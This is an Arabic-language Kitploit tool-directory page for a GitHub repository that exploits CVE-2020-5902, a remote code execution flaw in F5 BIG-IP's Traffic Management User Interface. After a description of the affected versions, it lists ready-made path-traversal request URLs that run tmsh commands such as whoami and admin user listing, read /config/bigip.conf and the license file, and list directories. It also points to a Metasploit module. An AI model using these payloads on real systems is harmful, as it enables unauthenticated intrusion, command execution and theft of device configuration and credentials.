Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5902 — [CVE-2020-5902] F5 BIG-IP تنفيذ التعليمات البرمجية عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/murataydemir/cve-2020-5902
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP تنفيذ التعليمات البرمجية عن بُعد (RCE)

عرض المستودع
215منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[CVE-2020-5902] تنفيذ التعليمات البرمجية عن بُعد في واجهة إدارة حركة المرور (TMUI) من F5 BIG-IP


في إصدارات BIG-IP 15.0.0-15.1.0.3، 14.1.0-14.1.2.5، 13.1.0-13.1.3.3، 12.1.0-12.1.5.1، و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، والتي يُشار إليها أيضًا باسم أداة التكوين، على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في صفحات غير معلنة.

تسمح هذه الثغرة للمهاجمين غير المصادَق عليهم، أو المستخدمين المصادَق عليهم، الذين لديهم وصول شبكي إلى أداة التكوين عبر منفذ إدارة BIG-IP و/أو عناوين IP الذاتية، بتنفيذ أوامر نظام عشوائية، أو إنشاء أو حذف ملفات، أو تعطيل الخدمات، و/أو تنفيذ كود Java عشوائي. قد تؤدي هذه الثغرة إلى اختراق كامل للنظام. نظام BIG-IP في وضع Appliance معرّض أيضًا لهذه الثغرة. لا يتم كشف هذه المشكلة على مستوى البيانات (data plane)؛ حيث يتأثر مستوى التحكم (control plane) فقط.

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

تم نشر الاستشارة الأمنية الأصلية بواسطة F5 ويمكنك الوصول إليها من هنا
أيضًا، توجد وحدة metasploit متاحة لـ CVE-2020-5902 بتقييم ممتاز. يمكنك الاطلاع على أكواد روبي الخاصة بوحدة metasploit من exploits/linux/http/f5_bigip_tmui_rce.rb

تنزيل الأداة